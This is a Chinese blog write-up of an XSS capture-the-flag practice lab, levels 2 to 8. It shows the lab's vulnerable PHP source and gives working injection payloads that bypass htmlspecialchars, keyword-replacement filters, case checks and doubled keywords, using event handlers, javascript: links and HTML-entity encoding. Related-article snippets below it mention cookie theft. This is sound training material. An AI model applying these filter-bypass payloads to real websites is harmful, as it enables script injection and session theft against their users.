CTF-XSS

最新推荐文章于 2024-07-25 13:45:00 发布
最新推荐文章于 2024-07-25 13:45:00 发布
阅读量640 收藏 1
点赞数 1
分类专栏: 安全 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/H2223/article/details/125993516
版权

环境源码

链接:https://pan.baidu.com/s/1qaSY5PbU8qwgBzbssGv4IA 
提取码:6elk

使用phpstudy运行

level2

 先写随便写一些字符

<input name="keyword" value="1">

发现字符出现在了双引号中

 

输入1">发现">逃逸出双引号了

输入1"><script>alert(1)</script><"

<input name="keyword" value="1"><script>alert(1)</script><"">

输入在HTML里是这样的

这样<script>alert(1)</script>就逃逸出""和<>了

level3

 到第三关,第二关的语句就失效了

看看后端代码:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level4.php?keyword=try harder!"; 
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

发现他使用了htmlspecialchars这个函数,htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体

htmlspecialchars(string,flags,character-set,double_encode)

在该函数中的第二个参数规定如何处理引号,默认是只处理双引号,不处理单引号

在代码中的函数没有第二个参数,他没有处理单引号,我们可以用单引号逃逸出来,但<script>标签有<>也会被过滤,可以使用onclick

1'οnclick='alert(1)

level4

 

 第四关对<script>标签有过滤,使用onclick就行

1'οnclick='alert(1)

level5

输入1'οnclick='alert(1)

<input name="keyword" value="1'o_nclick='alert(1)">

 输入1"><script>alert(1)</script><"

<scr_ipt>alert(1)&lt;""&gt;
<input type="submit" name="submit" value="搜索">

</scr_ipt>

分别对on和script有过滤

可以使用a标签和JavaScript伪协议

a"><a href="javascript:alert(1)">aaaaa</a>

level6

 查看前端代码

<input name="keyword" value="a">
<a hr_ef="javascript:alert(1)">aaaaa</a>

发现href被过滤了

查看源代码

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

发现过滤了很多标签,但没过滤大小写

1"ONCLICK="alert(1)

level7

输入a"><a href="javascript:alert(1)">aaaaa</a>

<a ="java:alert(1)"="">aaaaa</a>

发现script直接没了

1"ONCLICK="alert(1)也不行

试试双写

1"OONNCLICK="alert(1)

成功了

level8

这是一个友情链接,要在其中输入javascript:alert(1)

但script被过滤了,双写,大小写都不行

可以使用urlencode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

H2223
关注
专栏目录
ctf xss利用_xss总结--2018自我整理
weixin_39851809的博客
01-14 1336
0x00前言因为ctfxss的题目偏少(因为需要机器人在后台点选手的连接2333),所有写的比较少0x01xss作用常见的输出函数:print()、 print_r()、 echo、 printf()、 sprintf()、 die()、 var_dump()、 var_export()xss是往页面中添加了一段代码,并且被浏览器执行了反射型将恶意代码写入参数,或者自己服务器上搭个form表单传...
ctf xss利用_从xss挑战之旅来重读xss(一)
weixin_39735166的博客
11-29 658
在开始这篇文章之前,先简单聊几句: - xss很多时候是鸡肋,比如说self-xss - 很多厂商都会注明拒收反射xss,如58src - 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss - 遇到收反射xss的,证明截图拿cookies能比alert弹个窗多很多money - xss有时候也值很多钱,比如说某厂商的一个存储xss就给了3.5k其实我们基本上都知道xss是什么,在给厂商...
CTF学习笔记——XSS攻击
Obs_cure的博客
08-02 9844
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。[1]百度百科 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,与之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
最新发布
2401_82672634的博客
07-25 1467
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
CTFXSS浅谈(xsslabs)
glass_york的博客
10-07 715
主要针对XSS入门和XSSLABS前7关挑战
ctf xss利用_一道XSS题目分析
weixin_39960147的博客
01-14 1216
目录0x00 介绍题目地址:https://challenge.intigriti.io/题目的要求是绕过CSP实现XSS,执行alert(document.domain)。0x01 解决页面中加载了个script.js:varhash=document.location.hash.substr(1);if(hash){displayReason(hash);}document.getEle...
CTF-Web-XSS
beihai2013
02-03 764
XSS靶机 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> ## 若执行了alert,则执行以下语句 window.alert = function() { confirm("完成的不错!"); window.loc
ctf-browser-visitor:Bot访客服务,应对CTF中的XSS挑战
05-04
ctf浏览器访问者 Bot访问者应对CTF中的XSS挑战 http://127.0.0.1:5000/visit?job={"url":"url_to_visit","cookies":{"key":"value"}}
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
CTF(Capture The Flag)是一种网络安全竞赛,其中的AWD(Attack-Defend,攻防)模式是其中一种常见的比赛形式。在这个模式下,参赛队伍不仅要保护自己的服务器免受攻击,还需要找出并解决对手服务器上的漏洞,以...
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
Java代码可能存在的漏洞包括但不限于SQL注入、XSS跨站脚本、权限滥用、未加密敏感数据等。理解Java语言的特性以及如何避免这些常见漏洞至关重要。 三、Android逆向工程 逆向工程是分析移动应用安全的重要手段。通过...
ctf-writeups:CTF撰写
05-23
5. **JavaScript安全特性**:如XSS(跨站脚本攻击)、CSRF(跨站请求伪造)防护机制,了解这些可以帮助寻找绕过防御的方法。 6. **正则表达式**:在处理字符串验证或解析时,正则表达式是强大的工具,可能在过滤...
ctf xss利用_CTF小白入门- 跨站脚本攻击
weixin_39984952的博客
02-23 1130
跨站脚本攻击(Cross Site Scripting , XSS)是指攻击者巧妙的将恶意代码注入到网页中,当用户浏览器中加载网页、渲染网页时,就会执行的恶意代码的过程。经常遭到XSS漏洞的典型应用有 邮件、论坛、留言板等。新浪微博、百度贴吧也曾遭受过 XSS攻击。对内容有不理解的小伙伴或发现错误的小伙伴,可以私信和我联系,共同探讨。如果您喜欢,麻烦点个赞,(づ ̄ 3 ̄)づXSS可以造成哪些危害?...
CTF特训营》——跨站脚本攻击(XSS
PICACHU+++的博客
07-15 2317
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
ctfshow XSS专题
yink12138的博客
12-17 1507
ctfshow XSS专题
【web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2481
XSS-pikachu
[ctfhub]-xss详解
weixin_52116519的博客
04-28 5067
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
ctf_show笔记篇(web入门---XSS
whale_waves的博客
04-01 1320
这里简单对xss做一个了解:xss分为反射型和储存型反射型:一般是由攻击者选择攻击对象,对攻击对象发一个带有xss窃取cookie的页面的url,被攻击者点击就会动过document.cookie将用户信息一并发送给攻击方的服务器。反射型XSS一般发生在浏览器,当受害者访问含有XSS代码的页面时浏览器解析并执行XSS代码造成信息泄露。存储型:攻击方将恶意代码插入在存在漏洞的网站上,任何访问网站的人都会遭到攻击,比起反射型xss,存储型xss危害更大,范围更广。
xss--ctf,绕过,修复
2303_79592445的博客
03-12 731
发现多了一个修改密码,当我处于登录状态,去修改这个密码,然后抓个包,就会发现,它回去访问这个网站,它会随着url的改变而改变。用这种比较好,因为他不会自动跳转到那个修改密码的地址,之前的那个,当管理员打开那个数据库,就会直接跳转,就可能被发现。当我们将这个跳转代码写到上面,就会让它自动跳转到这个修改密码的网站,就可以达到修改密码的目的。(123是密码,以前是get直接访问就行,所有我们就需要js语句来实现post直接提交)密码改成js语句,然后后台访问数据库,就会获取管理员的 cookie。
ctf xss利用_【CTF】某xss练手小游戏
weixin_31188325的博客
01-14 285
http://test.xss.tv1、http://47.94.13.75/test/level1.php?name=test直接插入即可,如:http://47.94.13.75/test/level1.php?name=alert(1)2、http://47.94.13.75/test/level2.php?keyword=test文本框中输入,闭合一下即可,如:http://47.94.1...
ctfhub xss
09-19
引用和引用[2]中提到的CTFHUB-XSS是一种攻击技术,通过构造恶意链接或在存在XSS漏洞的地方注入恶意脚本来获取用户的cookie信息。攻击者可以通过诱使受害者点击带有恶意脚本的链接,从而在自己搭建的XSS平台上记录下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值